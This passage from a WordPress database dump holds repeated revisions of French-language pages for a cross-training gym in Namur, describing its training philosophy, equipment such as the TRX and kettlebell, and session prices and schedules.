Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:23', '2013-06-16 12:58:23', '', 5, 'http://www.crosstrainingcenter.be/?p=89', 0, 'revision', '', 0),
(102, 1, '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 'pico1', '', 'inherit', 'open', 'open', '', 'pico1', '', '', '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png', 0, 'attachment', 'image/png', 0),
(91, 1, '2013-06-16 12:58:34', '2013-06-16 12:58:34', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:34', '2013-06-16 12:58:34', '', 5, 'http://www.crosstrainingcenter.be/?p=91', 0, 'revision', '', 0),
(291, 1, '2013-07-04 18:52:09', '2013-07-04 18:52:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:09', '2013-07-04 18:52:09', '', 5, 'http://www.crosstrainingcenter.be/5-revision-37/', 0, 'revision', '', 0),
(293, 1, '2013-07-04 18:53:14', '2013-07-04 18:53:14', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:53:14', '2013-07-04 18:53:14', '', 5, 'http://www.crosstrainingcenter.be/5-revision-39/', 0, 'revision', '', 0),
(93, 1, '2013-06-16 13:08:28', '2013-06-16 13:08:28', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:08:28', '2013-06-16 13:08:28', '', 5, 'http://www.crosstrainingcenter.be/?p=93', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(95, 1, '2013-06-16 13:12:40', '2013-06-16 13:12:40', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-92 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:12:40', '2013-06-16 13:12:40', '', 5, 'http://www.crosstrainingcenter.be/?p=95', 0, 'revision', '', 0),
(97, 1, '2013-06-16 13:19:06', '2013-06-16 13:19:06', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-94 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x82.png\" width=\"300\" height=\"82\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:19:06', '2013-06-16 13:19:06', '', 5, 'http://www.crosstrainingcenter.be/?p=97', 0, 'revision', '', 0),
(99, 1, '2013-06-16 13:27:37', '2013-06-16 13:27:37', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:27:37', '2013-06-16 13:27:37', '', 5, 'http://www.crosstrainingcenter.be/?p=99', 0, 'revision', '', 0),
(100, 1, '2013-06-16 13:44:39', '2013-06-16 13:44:39', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-98 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:44:39', '2013-06-16 13:44:39', '', 5, 'http://www.crosstrainingcenter.be/?p=100', 0, 'revision', '', 0),
(101, 1, '2013-06-16 11:22:47', '2013-06-16 11:22:47', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:47', '2013-06-16 11:22:47', '', 22, 'http://www.crosstrainingcenter.be/?p=101', 0, 'revision', '', 0),
(105, 1, '2013-06-13 16:27:32', '2013-06-13 16:27:32', 'Nous vous  proposons chaque jour :\r\n\r\n- Team Training : entrainements en groupe avec un coach qualifié (8 à 12 pers.).\r\n\r\n- Duo Training : entrainements à deux personnes sous la supervision d’un coach.\r\n\r\n- Personal Training : un coach par personne, l’idéal pour progresser plus rapidement !\r\n- Coaching nutritionnel : rendez-vous avec une diététicienne pour améliorer votre santé.\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-13 16:27:32', '2013-06-13 16:27:32', '', 11, 'http://www.crosstrainingcenter.be/?p=105', 0, 'revision', '', 0),
